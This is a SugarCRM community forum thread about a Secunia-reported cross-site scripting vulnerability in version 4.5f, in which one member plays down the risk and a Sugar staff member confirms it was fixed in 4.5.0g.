LinkBack URL
About LinkBacksSecunia are reporting "SugarCRM Sugar Open Source Cross-Site Scripting Vulnerability"
In 4.5f
Apologies if this is old news ... searched on vulnerabilities and secunia
Has this been fixed in 4.5g
http://secunia.com/advisories/23424/
Sugar Community Member
Cross-Site Scripting Vulnerability
Secunia are reporting "SugarCRM Sugar Open Source Cross-Site Scripting Vulnerability"
In 4.5f
Apologies if this is old news ... searched on vulnerabilities and secunia
Has this been fixed in 4.5g
http://secunia.com/advisories/23424/
Sugar Community Member
Re: Cross-Site Scripting Vulnerability
Hi,
This exploit is a good example of one of these "theoretical" exploits that are "maybe" possible but only under rather and unrealistic conditions. I think that in real live this is not a security issue at all.
Sugar is not Ebay.
For Ebay such exploits are interesting as Ebay is one website and everybody uses it.
So you can send out a millions emails containing fake/preperad links to ebay.com and you can wait for a few people falling for it.
To use such an exploit with sugar you would need to directly target single people of which you know what sugar instalsl they are using, and on which machine etc. Very rare conditions are these.
I would not worry about this exploit.
I think that someone sends you an email with a link to his Sugar install and asking you to login (so that he know your password) is more risky.
Cheers
Gunnar
Gunnar von Boehn
myCRMspace
Sugar Team Member
Re: Cross-Site Scripting Vulnerability
As noted in the advisory itself, this was fixed in 4.5.0g.
Thanks for passing this along.
Andy
Andy Dreisch
Vice President, Online Team
Check out our Podcasts!
Sugar University for training
Sugar Wiki for developer and user help
SugarForge for modules, themes, lang packs
SugarExchange for production-ready extensions
Enter/view bugs via the Sugar bug tracker
There are currently 1 users browsing this thread. (0 members and 1 guests)
Posting Permissions
Reply With Quote
Bookmarks